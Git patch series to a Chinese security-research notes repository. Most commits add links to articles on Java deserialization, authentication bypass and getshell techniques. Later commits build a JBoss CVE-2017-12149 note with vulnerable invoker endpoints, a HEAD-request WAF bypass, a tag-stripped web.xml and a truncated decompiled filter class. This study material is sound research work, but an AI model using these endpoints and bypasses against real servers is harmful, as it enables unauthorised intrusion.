From bafaa63dcc47e2e2bae562eb6d8982b70e0efc3a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Jun 2022 11:00:08 +0800 Subject: [PATCH 001/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1639ea4..486304a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -134,3 +134,4 @@ + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) ++ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** From e7f45d6c353408c289bb56cf3d797671e13e524f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Jun 2022 11:16:08 +0800 Subject: [PATCH 002/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 486304a..94af294 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -135,3 +135,4 @@ + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** ++ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** From 9f89c57ca7a377204b5b736b4c6303498e1c2f1a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 18 Jun 2022 23:10:07 +0800 Subject: [PATCH 003/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 94af294..b8f6a30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -136,3 +136,4 @@ + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** ++ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** From 3b199f945fb869f8cb3e7df63ea176b660697c4a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 22 Jun 2022 17:27:24 +0800 Subject: [PATCH 004/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8f6a30..e06ff9a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -137,3 +137,4 @@ + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** ++ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) From fd59cc19dcba105a9124ece08537db56131669b5 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 10:14:40 +0800 Subject: [PATCH 005/257] Update Readme.md --- "java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index d69975f..722fd77 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -2,6 +2,7 @@ >https://github.com/lufeirider/BypassShell/blob/master/JAVA/JAVA.md +>https://gosecure.github.io/template-injection-workshop/#0 + [FreeMarker模板注入](FreeMarker) 后缀名.ftl From 83bf9845180d808bcd8fc77b2e57169d66f014e1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 12:58:08 +0800 Subject: [PATCH 006/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e06ff9a..f55dbba 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -138,3 +138,4 @@ + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) ++ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** From 122d66a5e11cfd65e3746928fdc6b60d57d774e7 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 13:12:45 +0800 Subject: [PATCH 007/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f55dbba..a778fc9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -139,3 +139,4 @@ + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** ++ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** From 19f099d56bd1f458e15a6177638cfb8677a09011 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:02:51 +0800 Subject: [PATCH 008/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a778fc9..176579a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -140,3 +140,4 @@ + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** ++ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** From f65caaf7b8980cac7f91d764ebd37ac0de0397b1 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:30:37 +0800 Subject: [PATCH 009/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 176579a..7707a95 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -141,3 +141,4 @@ + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** ++ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** From 57e516fe9bfaf3b6741fe68f6e936fb8b4a8f4e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:44:18 +0800 Subject: [PATCH 010/257] Update Readme.md --- SnakeYaml/Readme.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index ec4c550..cf6bec6 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -1,7 +1,9 @@ # snakeyaml ## 不出网利用 ->通过fastjson写文件如何本地加载rce +>通过写文件然后本地加载rce + +//todo 写一个工具 去完成 https://xz.aliyun.com/t/10655 From 7b70f617cbdd71ebd25336b2cdeb6d1b22c736ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Jun 2022 22:28:08 +0800 Subject: [PATCH 011/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7707a95..8fae1f4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -142,3 +142,4 @@ + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** ++ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** From 8b296e1c18e4399452d2dc598206df74779402dc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Jun 2022 23:12:36 +0800 Subject: [PATCH 012/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8fae1f4..a159900 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -143,3 +143,4 @@ + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** ++ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** From 12bfda258a9263bc6405c25f850297639ef3771b Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 29 Jun 2022 08:53:45 +0800 Subject: [PATCH 013/257] Update Readme.md --- .../Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" index 90be438..6073000 100644 --- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" +++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" @@ -155,7 +155,10 @@ pom.xml 中版本修改为 1.7.0 或及以下即可 /admin/%20 ``` +## CVE-2022-32532 +[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532) +原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) >参考: > From 0375cf9efffa189c8c02f2057f4d31bb3cb497dc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 30 Jun 2022 09:57:35 +0800 Subject: [PATCH 014/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a159900..b8c200b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -47,7 +47,7 @@ + 2021/10/26 [Hessian 原理分析](https://www.cnblogs.com/shangxiaofei/p/4222170.html) 大概就是以二进制数组传输的rpc,存在反序列化问题。 + 2021/10/26 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) + 2021/10/30 [Mojarra JSF ViewState 反序列化漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/113135364) -+ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** ++ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** [代码修复](https://github.com/openjdk/jdk8u-dev/commit/644ddd7722bea502f029378c22d51b6eb66f8c25) + 2021/11/02 [Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)](https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md) 暴露接口反序列化。。。 + 2021/11/03 [浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞](https://xz.aliyun.com/t/7485) + 2021/11/03 [H2 Database Console 未授权访问](https://github.com/vulhub/vulhub/blob/master/h2database/h2-console-unacc/README.zh-cn.md) From e4ce9bdc0217e92f8c14105f3ee8066c2fdb121b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Jul 2022 16:11:38 +0800 Subject: [PATCH 015/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8c200b..b82a05e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -144,3 +144,4 @@ + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** ++ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) From 521cf5dd53eeeca310a7ab8f239a25d9e0433991 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 3 Jul 2022 20:21:01 +0800 Subject: [PATCH 016/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b82a05e..415bb41 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -145,3 +145,4 @@ + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) ++ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** From 5658e488a7fe1486912002ab287817ee32e70eca Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:24:24 +0800 Subject: [PATCH 017/257] Update README.md --- Jboss/README.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 029922c..840d1a5 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -1,4 +1,4 @@ -## jboss介绍: +# jboss介绍: JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 @@ -6,3 +6,14 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 所以自己想写一个综合利用的工具。。。 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) + +## CVE-2017-12149 + +**endpoint** +``` +/invoker/readonly +/invoker/EJBInvokerServlet +/invoker/JMXInvokerServlet +/invoker/readonly/JMXInvokerServlet +/invoker/restricted/JMXInvokerServlet +``` From 5c7898aae22bcfeae2dd48ce1b62f57808317143 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:30:14 +0800 Subject: [PATCH 018/257] Update README.md --- Jboss/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 840d1a5..05bb751 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -8,7 +8,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) ## CVE-2017-12149 - +bypass 请求方式是HEAD **endpoint** ``` /invoker/readonly From 9bedef620fa3a13cf65efd526a50fcdfd6030dbf Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:30:28 +0800 Subject: [PATCH 019/257] Update README.md --- Jboss/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Jboss/README.md b/Jboss/README.md index 05bb751..10fa4ff 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -9,6 +9,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 ## CVE-2017-12149 bypass 请求方式是HEAD + **endpoint** ``` /invoker/readonly From 90e4dc33aec17ad352ad094d770eb7d92803452c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:59:33 +0800 Subject: [PATCH 020/257] Update README.md --- Jboss/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 10fa4ff..aa2b85d 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -12,7 +12,7 @@ bypass 请求方式是HEAD **endpoint** ``` -/invoker/readonly +/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的 /invoker/EJBInvokerServlet /invoker/JMXInvokerServlet /invoker/readonly/JMXInvokerServlet From 566fae7b414b0391b9c6ab5e6ca3ecc0eedc3549 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 14:03:06 +0800 Subject: [PATCH 021/257] Update README.md --- Jboss/README.md | 490 +++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 489 insertions(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index aa2b85d..6e56210 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -7,7 +7,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) -## CVE-2017-12149 +## 反序列化漏洞 bypass 请求方式是HEAD **endpoint** 
@@ -18,3 +18,491 @@ bypass 请求方式是HEAD /invoker/readonly/JMXInvokerServlet /invoker/restricted/JMXInvokerServlet ``` +http-invoker.sar 组件的问题 + +web.xml + +```xml + + + + + + + ReadOnlyAccessFilter + org.jboss.invocation.http.servlet.ReadOnlyAccessFilter + + readOnlyContext + readonly + The top level JNDI context the filter will enforce + read-only access on. If specified only Context.lookup operations + will be allowed on this context. Another other operations or lookups + on any other context will fail. Do not associate this filter with the + JMXInvokerServlets if you want unrestricted access. + + + + invokerName + jboss:service=NamingBeanImpl + The JMX ObjectName of the naming service mbean + + + + + + ReadOnlyAccessFilter + /readonly/* + + + + + EJBInvokerServlet + The EJBInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the EJB invoker given by + the invokerName init-param. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + + invokerName + jboss:service=invoker,type=http + The RMI/HTTP EJB compatible invoker + + 1 + + + JMXInvokerServlet + The JMXInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the invoker given by + the the MBean whose object name hash is specified by the + invocation.getObjectName() value. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + 1 + + + + JNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http. The return content is a serialized + MarshalledValue containg the org.jnp.interfaces.Naming stub. This + configuration handles requests for the standard JNDI naming service. 
+ + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming + + + proxyAttribute + Proxy + + 2 + + + + ReadOnlyJNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http, but only for a single read-only context. The return content + is a serialized MarshalledValue containg the org.jnp.interfaces.Naming + stub. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming,readonly=true + + + proxyAttribute + Proxy + + 2 + + + + + JNDIFactory + /JNDIFactory/* + + + + ReadOnlyJNDIFactory + /ReadOnlyJNDIFactory/* + + + EJBInvokerServlet + /EJBInvokerServlet/* + + + JMXInvokerServlet + /JMXInvokerServlet/* + + + + JMXInvokerServlet + /readonly/JMXInvokerServlet/* + + + + + JNDIFactory + /restricted/JNDIFactory/* + + + JMXInvokerServlet + /restricted/JMXInvokerServlet/* + + + + + + HttpInvokers + An example security config that only allows users with the + role HttpInvoker to access the HTTP invoker servlets + + /restricted/* + GET + POST + + + HttpInvoker + + + + BASIC + JBoss HTTP Invoker + + + + HttpInvoker + + +``` +org.jboss.invocation.http.servlet.ReadOnlyAccessFilter +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.lang.reflect.Method; +import java.security.Principal; +import java.util.Map; +import javax.management.MBeanServer; +import javax.management.ObjectName; +import javax.servlet.Filter; +import javax.servlet.FilterChain; +import javax.servlet.FilterConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletRequest; +import javax.servlet.ServletResponse; +import javax.servlet.http.HttpServletRequest; +import org.jboss.invocation.MarshalledInvocation; 
